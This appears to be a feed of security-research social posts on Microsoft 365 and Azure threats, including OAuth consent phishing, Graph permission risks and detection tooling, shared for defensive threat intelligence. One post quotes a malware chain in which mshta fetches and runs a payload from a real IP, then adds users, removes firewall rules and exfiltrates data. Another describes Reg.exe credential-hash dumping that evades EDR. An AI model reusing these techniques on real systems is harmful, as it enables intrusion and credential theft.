An attacker made 81M login attempts against Microsoft accounts in two weeks.
78 accounts were compromised, all with MFA on...but misconfigured.
We're breaking it all down in this month's Tradecraft Tuesday: https://t.co/1ShHosGDe2
Jul 14, 2026 | 1:00pm ET | 10:00am PT
Microsoft Graph Permissions list classified by severity and privileged impact to detect risky OAuth consents, over-privileged apps, consent phishing, apps with dangerous access, and enrich SIEM detections/app reviews.
https://t.co/Aa0UHz8Ugj
By abusing the extended invocation of the system whitelisted utility Reg.exe, the adversary skillfully bypasses the detection and interception mechanism of antivirus solutions, evades EDR controls, and successfully performs credential hash dumping.
https://t.co/6ABfJj52Ph
In my latest blog "Now You See Me: AADGraphActivityLogs" I explore the newly released Azure AD Graph logs and demonstrate how you can detect tools like ROADtools and AADinternals that rely on this API and have been under the radar for defender so far.
https://t.co/TXlkbsqKHa
If you're feeling nerdy and just have to know how browser SSO works, read this amazing write-up 😎
https://t.co/UBPOzzOZE2
For those feeling less nerdy, the browser makes calls to get PRT/device auth from CloudAP/WAM. Private mode doesn't allow those calls, so no device state.
Threat researchers at @Proofpoint are tracking two ongoing, highly targeted campaigns combining OAuth redirection mechanisms with brand impersonation techniques, malware proliferation and #Microsoft365 themed #credential phishing for #Account Takeover (#ATO).
It's a good time to ask: do we have the ability to detect, investigate, and remediate the authorization of malicious third-party OAuth applications?
The team at Microsoft published a post detailing how to investigate and remediate risky OAuth apps (linked below).
A couple of other points:
- To respond, remove the OAuth app and revoke its permissions.
- You can restrict which users can authorize new OAuth apps, but in this campaign, it appears attackers targeted employees likely to have these permissions.
https://t.co/MNh0nWRZvn
Malware download and use of the Wazuh SIEM agent for remote access and telemetry harvesting.
"remote_commands" option
https://t.co/Icb45EjDAh
ref:
https://t.co/Z5VGrUrDe6
📚 Awesome Threat Detection
A curated list of awesome threat detection and hunting resources
By @0x4d31 and contributors
https://t.co/8RWkDPdnAR
#cybersecurity
Today, we introduce the Reply URL Brute tool that enumerates single and multitenant #Azure applications without user interaction. The tool helps blue teams exploring and enumerating the attack surface that multitenant applications have in a tenant.
https://t.co/crUXpScExZ
This one lit up like a Christmas tree on @anyrun_app
http://45.139.196.250 -> Verify -> mshta.exe 45.139.196[.]250/recaptcha-verify -> xdr.bat&auto-install-hrdp.bat
Install smbclient to add a new user , delete firewall rules and exfills data with ngrock
https://t.co/kO6Ccsdafw
Dynamic Detection and Classification of Persistence Techniques in Windows Malware - master thesis by Jorik Jaromir van Nielen.
#redteam#maldev
https://t.co/s7EjBpam0M
🚨 "New" #MicrosoftGraph attack vector exposed! 🚨
Discover how attackers can exploit PIM-related app permissions to gain unauthorized access & elevate privileges in your M365 tenant.
Read @emilien_socchi's great analysis now:
https://t.co/jEOWUXHw4R
#cybersecurity